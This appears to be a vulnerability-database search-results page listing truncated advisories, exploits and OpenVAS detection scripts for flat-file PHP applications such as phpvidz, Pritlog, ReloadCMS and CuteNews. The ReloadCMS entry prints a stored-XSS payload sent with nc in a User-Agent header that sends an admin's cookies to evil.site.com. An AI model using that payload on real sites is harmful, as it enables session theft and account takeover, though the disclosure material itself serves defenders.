CVE-2024-50386 Apache CloudStack: Directly downloaded templates can be used to abuse KVM-based infrastructure
Account users in Apache CloudStack by default are allowed to register templates to be downloaded directly to the primary storage for deploying instances. Due to missing validation checks for KVM-compatible templates in CloudStack 4.0.0 through 4.18.2.4 and 4.19.0.0 through 4.19.1.2, an attacker...
phpvidz 0.9.5 Administrative Credentials Disclosure
No description provided by source. Researcher: Michael Brooks Affecting: phpvidz 0.9.5 Vulnerability: Administrative Credentials Disclosure Vendor's Homepage: http://sourceforge.net/projects/phpvidz/ phpvidz does not use a SQL database. Instead it uses a system of flat files to maintain applicati...
Pritlog <= 0.4 (filename) Remote File Disclosure Vulnerability
No description provided by source. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Printlog <= 0.4: Remote File Edition Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= $ Program: Printlog $ File affected: index.php $ Version: 0.4 $ Download: http://www.hardkap.net/pritlog Found...
ReloadCMS <= 1.2.5 Cross Site Scripting / Remote Code Execution Exploit
No description provided by source. <?php /* ReloadCMS <= 1.2.5stable Cross site scripting / remote command execution software site: http://reloadcms.com/ description: ReloadCMS is a free CMS written on PHP and based on flat files. vulnerability: ReloadCMS do not properly sanitize User-Agent request...
PHP-Board 1.0 User Password Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/6862/info php-board user information is stored in flat files on the system hosting the software. Access to the files via the web is not sufficiently restricted. Remote attackers may request user files and gain access to...
PHPvidz Administrative Credentials Disclosure Vulnerability
This host is running PHPvidz and is prone to administrative credentials disclosure vulnerability. OpenVAS Vulnerability Test $Id: gbphpvidzinfodiscvuln.nasl 5794 2017-03-30 13:52:29Z cfi $ PHPvidz Administrative Credentials Disclosure Vulnerability Authors: Antu Sanadi Copyright: Copyright (c) 2010...
phpvidz 0.9.5 Administrative Credentials Disclosure
Exploit for php platform in category web applications =================================================== phpvidz 0.9.5 Administrative Credentials Disclosure =================================================== Researcher: Michael Brooks Affecting: phpvidz 0.9.5 Vulnerability: Administrative...
phpvidz 0.9.5 - Administrative Credentials Disclosure
Researcher: Michael Brooks Affecting: phpvidz 0.9.5 Vulnerability: Administrative Credentials Disclosure Vendor's Homepage: http://sourceforge.net/projects/phpvidz/ phpvidz does not use a SQL database. Instead it uses a system of flat files to maintain application state. The administrative passwo...
phpvidz Administrative Password Disclosure
Original Advisory: http://blog.sitewat.ch/2010/05/phpvidz-administrative-password.html Affecting: phpvidz 0.9.5 Vulnerability: Administrative Password Disclosure Vendor's Homepage: http://sourceforge.net/projects/phpvidz/ Date: May 15th 2010 Researcher: Michael Brooks phpvidz does not use a SQL...
[SECURITY] Fedora 11 Update: nss_db-2.2-46.fc11
Nssdb is a set of C library extensions which allow Berkeley Databases to be used as a primary source of aliases, ethers, groups, hosts, networks, protocol, users, RPCs, services, and shadow passwords instead of or in addition to using flat files or NIS. Install nssdb if your flat name service fil...
CuteNews Detection (HTTP)
HTTP based detection of CuteNews. SPDX-FileCopyrightText: 2009 Greenbone AG Some text descriptions might be excerpted from (a) referenced source(s), and are Copyright (C) by the respective right holder(s). SPDX-License-Identifier: GPL-2.0-only if(description) { script_oid("1.3.6.1.4.1.25623.1.0.100105");...
CuteNews Detection
This host is running CuteNews, a powerful and easy to use news management system that uses flat files to store its database OpenVAS Vulnerability Test $Id: cutenewsdetect.nasl 5943 2017-04-12 14:44:26Z antu123 $ CuteNews Detection Authors: Michael Meyer Updated to detect UTF-8 CuteNews - By Antu...
printlog-disclose.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Printlog eNYe-Sec - www.enye-sec.org -- Description by the author's page -- PRITLOG is an extremely simple, small and powerful blog system. It does not use or need a MYSQL database and fully works based on flat files. The idea is derived from a...
Printlog <= 0.4 (filename) Remote File Disclosure Vulnerability
No description provided by source. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Printlog <= 0.4: Remote File Edition Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= $ Program: Printlog $ File affected: index.php $ Version: 0.4 $ Download: http://www.hardkap.net/pritlog Found...
Pritlog 0.4 - 'Filename' Remote File Disclosure
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Printlog eNYe-Sec - www.enye-sec.org -- Description by the author's page -- PRITLOG is an extremely simple, small and powerful blog system. It does not use or need a MYSQL database and fully works based on flat files. The idea is derived from a...
Pritlog 0.4 - Filename Remote File Disclosure
Pritlog 0.4 - Filename Remote File Disclosure -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Printlog eNYe-Sec - www.enye-sec.org -- Description by the author's page -- PRITLOG is an extremely simple, small and powerful blog system. It does not use or need a MYSQL database and fully works bas...
XSS in JAB Guest Book
Script Name: JAB Guest Book Authors: [email protected] Website: James Barnsley Bug Report: NetJackal njAThackerzDOTir & nima501ATyahooDOTcom Status: Patch not released First i should apologize for my bad english. Intro: JAB Guest Book is a free guest book written in PHP, it works using flat fil...
CuteNews 1.4.1 Multiple vulnerabilities
/ --------------------------------------------------------------- Neo Security Team NST® Advisory 20 --------------------------------------------------------------- Program : CuteNews 1.4.1 Homepage: http://www.cutephp.com Vulnerable Versions: CuteNews 1.4.1 & lower ones Risk: Medium! Impact: Cro...
ReloadCMS-1.2.5.txt
nc target.host.com 80 GET /pathtoreloadcms/ HTTP/1.0 User-Agent: "window.open"http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL;window.close; Host: target.host.com Connection: Close So, when admin see site statistics through the administration panel, javascript will run Once...
ReloadCMS <= 1.2.5stable Cross site scripting / remote command execution
<?php /* ReloadCMS <= 1.2.5stable Cross site scripting / remote command execution software site: http://reloadcms.com/ description: "ReloadCMS is a free CMS written on PHP and based on flat files." vulnerability: ReloadCMS do not properly sanitize User-Agent request header before to store it in...